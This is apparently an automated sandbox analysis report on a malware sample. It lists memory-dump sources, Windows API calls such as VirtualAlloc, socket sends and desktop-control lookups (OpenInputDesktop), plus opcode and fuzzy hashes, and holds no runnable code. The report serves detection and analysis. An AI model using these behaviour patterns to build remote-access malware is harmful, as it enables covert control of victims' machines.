                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memcpy_s
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0$+p$+p
                                • API String ID: 2001391462-1437108087
                                • Opcode ID: c18a8148b95cad1ed025a467c6ba81e07f6ef5b595a500a6d11e9f92d007a4bb
                                • Instruction ID: c01ade38ecee019ce7174fdce504e3cb73721ea94f389251aeac80261dcdc65b
                                • Opcode Fuzzy Hash: c18a8148b95cad1ed025a467c6ba81e07f6ef5b595a500a6d11e9f92d007a4bb
                                • Instruction Fuzzy Hash: C021A171A40B02AFD724DF68C881EA6B3A6FF99310F14465EE5188B380D771EC418BD0
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,75920440,00001000,00000004,ectGH,?,75920440), ref: 1000113D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: ectGH
                                • API String ID: 4275171209-715425569
                                • Opcode ID: 1e20c73665287f5665b6f5928c8ef180192977c54f47a723f090bc288ae69d29
                                • Instruction ID: defcdcdcb73441d30e326f7484f40543440fe1f0ec2939d75e8a3545c5d61d59
                                • Opcode Fuzzy Hash: 1e20c73665287f5665b6f5928c8ef180192977c54f47a723f090bc288ae69d29
                                • Instruction Fuzzy Hash: 3B31B271A04209EBEB14CF65C881BDE7BA8FF447D1F10C529FD599B240D771D6808B94
                                APIs
                                • send.WS2_32(?,75920440,00000003,00000000), ref: 100015A2
                                • Sleep.KERNEL32(0000000A,?,10001846,00000000,00000000,00000000,00002000,?,00000003,?), ref: 100015C5
                                • send.WS2_32(?,75920440,00000000,00000000), ref: 100015EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: send$Sleep
                                • String ID: ectGH
                                • API String ID: 3329562092-715425569
                                • Opcode ID: f4de54fce832839fe201d6e2e8f86e86662b24aa0f311dddda10bb6b0ae4a077
                                • Instruction ID: 03d244f2d627c9f40ce105f290f59351b91c393ba2e6a7d61054a3bfa6e6fd56
                                • Opcode Fuzzy Hash: f4de54fce832839fe201d6e2e8f86e86662b24aa0f311dddda10bb6b0ae4a077
                                • Instruction Fuzzy Hash: FA219C71600655EBEB04CF65CCC4BDE77A4EB89792F144528F91A8F281E772DE50C790
                                APIs
                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 006D104D
                                • _memset.LIBCMT ref: 006D1061
                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 006D107B
                                • _memmove.LIBCMT ref: 006D108E
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual$_memmove_memset
                                • String ID:
                                • API String ID: 725130153-0
                                • Opcode ID: df6a48c7d84653bbed2082b0589ec134db1cb0ec9deda5b9a60f444044c6c1fe
                                • Instruction ID: 8111092ead824090709f710bf4503216ffea146ea34ca23a1d107035b0efb141
                                • Opcode Fuzzy Hash: df6a48c7d84653bbed2082b0589ec134db1cb0ec9deda5b9a60f444044c6c1fe
                                • Instruction Fuzzy Hash: 97216D75600204AFD724DF54DC84FAAB3F6EB8A711F24855EF9499B340C6B0ED81CB64
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,00000001), ref: 10001267
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 678a4ff74caf5bb1f30e7b552d0ddf46cc97f5f180e68801602be90318e0ee48
                                • Instruction ID: 2163c4323f5d2ed6fe343eb5c8a3bcff85842b9f753613c049ff4e4a263a3538
                                • Opcode Fuzzy Hash: 678a4ff74caf5bb1f30e7b552d0ddf46cc97f5f180e68801602be90318e0ee48
                                • Instruction Fuzzy Hash: 5D31D271A04209EBEB14CFA9D980ADEBBB4FF44791F20C52AFD199B544D631A9508780
                                APIs
                                • send.WS2_32(?,75920440,00000003,00000000), ref: 100015A2
                                • Sleep.KERNEL32(0000000A,?,10001846,00000000,00000000,00000000,00002000,?,00000003,?), ref: 100015C5
                                • send.WS2_32(?,75920440,00000000,00000000), ref: 100015EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: send$Sleep
                                • String ID:
                                • API String ID: 3329562092-0
                                • Opcode ID: 0e7738013a8c8420da5474b09143bb400010037257207722f6fe7821d800315d
                                • Instruction ID: ca54abe552cf3d940b252e330287410d3f879888c4e130731e76e0fc7094d52e
                                • Opcode Fuzzy Hash: 0e7738013a8c8420da5474b09143bb400010037257207722f6fe7821d800315d
                                • Instruction Fuzzy Hash: F1118C71A00714DBEB15CF64CCC4BDE77A4FB89792F144529F91A8A284E771DE50CA80
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,7555B5F0,00000000,00000000,00000000,00000000), ref: 100078FB
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000792D
                                • CloseHandle.KERNEL32(?), ref: 10007937
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateEventHandleObjectSingleWait
                                • String ID:
                                • API String ID: 2631291778-0
                                • Opcode ID: fff58b616cc4deb08d4cad9388d6a8b7abe43a148809c3e994bb488f2c205561
                                • Instruction ID: fb9a880634deb825c1f67a9bf4b990f419f8ece08db7ad9c16453d9b3be0102f
                                • Opcode Fuzzy Hash: fff58b616cc4deb08d4cad9388d6a8b7abe43a148809c3e994bb488f2c205561
                                • Instruction Fuzzy Hash: 2C011D75A00219FFDB00DF98CC85F9E77B9EB48711F108649F918A7384D671EA118BD1
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,?,00000000,?,00000000,00000000,?), ref: 0070F2BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ByteCharMultiPeekPostQuitWide
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
                                • API String ID: 3861658994-1644011
                                • Opcode ID: 6f7d6961adaf0d2375342a1988df72371c12f88e358b2099c241345c872f5cff
                                • Instruction ID: bbca04dc217636cd29264144af92b29db7e58cf84ecb1da43bc3ff3028ea00db
                                • Opcode Fuzzy Hash: 6f7d6961adaf0d2375342a1988df72371c12f88e358b2099c241345c872f5cff
                                • Instruction Fuzzy Hash: 76214F34600208EBDB20DFA8CC45BAE77E5BF85705F108164FD199A6C1D6B9EA40C750
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • _malloc.LIBCMTD ref: 006F4B81
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp, xrefs: 006F4B36, 006F4B54
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuit_malloc
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
                                • API String ID: 337452713-3707599205
                                • Opcode ID: cf0030d82c4dad6100af10150c9757f44765038c0d40dab663a976605cf9d75e
                                • Instruction ID: 9f40500c9cb2acc2237c7e2d6eeffedd7b5f91f8ab8004b856ed21c8e4b7ad7f
                                • Opcode Fuzzy Hash: cf0030d82c4dad6100af10150c9757f44765038c0d40dab663a976605cf9d75e
                                • Instruction Fuzzy Hash: 6F111974A0020DEBDB14DF68C545BAEB7B1BB84344F20C598E919AB782DB74DE40CB85
                                APIs
                                • __CxxThrowException@8.LIBCMT ref: 10001A53
                                • __CxxThrowException@8.LIBCMT ref: 10001A68
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID:
                                • API String ID: 2005118841-0
                                • Opcode ID: 1c1b5793b365d64bb6f8f9ec81948bd1da7653c3b02d9f0094fde8bb2d5d4ce5
                                • Instruction ID: 030a670236472cc5b91498b6ece0044f483d00ad48767156c5efc8a7a1cf3f1b
                                • Opcode Fuzzy Hash: 1c1b5793b365d64bb6f8f9ec81948bd1da7653c3b02d9f0094fde8bb2d5d4ce5
                                • Instruction Fuzzy Hash: 2761C2B4A006496BEB05DF64C8A1BEEB7B9FF486C0F444018F545AB24ADB74BB01C7A5
                                APIs
                                  • Part of subcall function 100012D0: VirtualFree.KERNEL32(00000000,00000000,00008000,75920440,10001733,00000000,75920440,00000000,10003581,000000C8,0000022C), ref: 100012E2
                                  • Part of subcall function 10008210: _malloc.LIBCMT ref: 1000822A
                                • _memmove.LIBCMT ref: 10001762
                                • _memmove.LIBCMT ref: 100017D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove$FreeVirtual_malloc
                                • String ID:
                                • API String ID: 2091092873-0
                                • Opcode ID: 53145c6178b76e337d64ba67b3d5185ab000d012c8eeffeae064e33ab36c2d9b
                                • Instruction ID: fbefb07823a3c945f3d8c8a89602d11693f3d6dded4fe17736d7e5900344f4d8
                                • Opcode Fuzzy Hash: 53145c6178b76e337d64ba67b3d5185ab000d012c8eeffeae064e33ab36c2d9b
                                • Instruction Fuzzy Hash: B53130BA500104AAE704DF54DD92EEA37B9EF94790F104169FD099B18AEA71FB04C7A1
                                APIs
                                • VirtualFree.KERNELBASE(?,?,00004000), ref: 006D111B
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 006D1175
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$FreeProtect
                                • String ID:
                                • API String ID: 2581862158-0
                                • Opcode ID: 3e34ed109d2f4427b2e6e243e5ba4cb5a811bf37fb058bbcd12f6de2a23f55bb
                                • Instruction ID: 135fbab2aae9a5a1aa375718363b195945731e9ef9fe6d4d1179db8e5220ddcd
                                • Opcode Fuzzy Hash: 3e34ed109d2f4427b2e6e243e5ba4cb5a811bf37fb058bbcd12f6de2a23f55bb
                                • Instruction Fuzzy Hash: F621B270A001059BDB18CF54D894BBAB7B6EB8A704F10428AD50A9F355D770EC52C791
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove_s
                                • String ID:
                                • API String ID: 800865076-0
                                • Opcode ID: c93875f06e1952f31a997b129ebaff654df230ad09fe3377ed28c07955b905a8
                                • Instruction ID: f3ef3029b0c749a02e0f8319093f1666819ce952e37ab1dbc4d6fa5ba718103b
                                • Opcode Fuzzy Hash: c93875f06e1952f31a997b129ebaff654df230ad09fe3377ed28c07955b905a8
                                • Instruction Fuzzy Hash: 00119336A005056F9B04EA59E8A4D6EF36BEFE4360700812FF8049F311D971AC1587A4
                                APIs
                                • ActivateActCtx.KERNEL32(?,00000000,ED5B0DC1,?,00000000), ref: 00702489
                                • LoadLibraryW.KERNEL32(007A6382,?,00000000), ref: 007024AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ActivateLibraryLoad
                                • String ID:
                                • API String ID: 389599620-0
                                • Opcode ID: 34702a66c04bc6f8dd50f85500957fcebd2bdb4570bb75dd60333358d248e999
                                • Instruction ID: a666c70602e8e1d5848ee31b8da74c16a8447fdcc74ae13dfeceb42be1da3ab4
                                • Opcode Fuzzy Hash: 34702a66c04bc6f8dd50f85500957fcebd2bdb4570bb75dd60333358d248e999
                                • Instruction Fuzzy Hash: 00112E72905248EBCB10CF95DD49BDEB7F8FB88720F104669E415A3280D7799901CBA4
                                APIs
                                • __getptd.LIBCMT ref: 10009351
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                  • Part of subcall function 10009326: __getptd_noexit.LIBCMT ref: 1000932B
                                  • Part of subcall function 10009326: __freeptd.LIBCMT ref: 10009335
                                  • Part of subcall function 10009326: ExitThread.KERNEL32 ref: 1000933E
                                • __XcptFilter.LIBCMT ref: 10009372
                                  • Part of subcall function 1000F312: __getptd_noexit.LIBCMT ref: 1000F318
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                • String ID:
                                • API String ID: 418257734-0
                                • Opcode ID: b8585eb7d3f5081fa79e5d6c3f0d89a996ff0bcc65e3501ac09246017a8e0359
                                • Instruction ID: 8963d6bf6af1f66b3a171e10482e192efdc6f1e3ee6569b53a7c5b9d98e414eb
                                • Opcode Fuzzy Hash: b8585eb7d3f5081fa79e5d6c3f0d89a996ff0bcc65e3501ac09246017a8e0359
                                • Instruction Fuzzy Hash: 8BE0ECB9900604AFE718EBA0D906E7E7765EF04255F20004DF1016B2A6CB35BA80EB20
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5ae72e4246da1bc0cb2d4036dcfb93dbdcbcb7e207c7ed2c49414030178601a
                                • Instruction ID: 3c079083af270b02e3454f9942eb2c977a2101855a984c7b9f4481f0c853fdf8
                                • Opcode Fuzzy Hash: a5ae72e4246da1bc0cb2d4036dcfb93dbdcbcb7e207c7ed2c49414030178601a
                                • Instruction Fuzzy Hash: 801182373006015FA714D97EE844D9FB7DDEBC46D1301852EFA5AD7A08EA30F94087A0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 806a9c743cf49840c03e939b0294ca11aa49a2263f87d2585eab5652d43433f7
                                • Instruction ID: 2164c872955335cdc44087eb9695d4ca786d234c01808f26e2c32fd6a75f885f
                                • Opcode Fuzzy Hash: 806a9c743cf49840c03e939b0294ca11aa49a2263f87d2585eab5652d43433f7
                                • Instruction Fuzzy Hash: 90F0A0777002056BD324DA6EEC40C9FB3DCEFD56F4704862EF95AC3A44D521E94583A0
                                APIs
                                • SetEvent.KERNEL32(?), ref: 100078B5
                                  • Part of subcall function 100070D0: LoadLibraryA.KERNEL32(user32.dll,?,?,?), ref: 100070F8
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000710F
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000711A
                                  • Part of subcall function 100070D0: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 10007124
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$EventLibraryLoad
                                • String ID:
                                • API String ID: 2618588663-0
                                • Opcode ID: 6776b34cee24cbd4311b19dc590eebf18a576e794641c413ff325208622a530f
                                • Instruction ID: d2e018ab72eefce2ca95f8483c115166540ba0ce62ae5c321d6bcc7c78ecc956
                                • Opcode Fuzzy Hash: 6776b34cee24cbd4311b19dc590eebf18a576e794641c413ff325208622a530f
                                • Instruction Fuzzy Hash: D9E0923A6001049FD2008BA9D884E95B7ECEF4A661B0880A5F64C8B212C221B80187A1
                                APIs
                                • FindResourceW.KERNEL32(00000000,00000000,00000006,?,?,?,006F0FE8,00000000,006F0CF4,?,006F0CF4,00000000,006F109A,?,006F109A), ref: 006D4B78
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FindResource
                                • String ID:
                                • API String ID: 1635176832-0
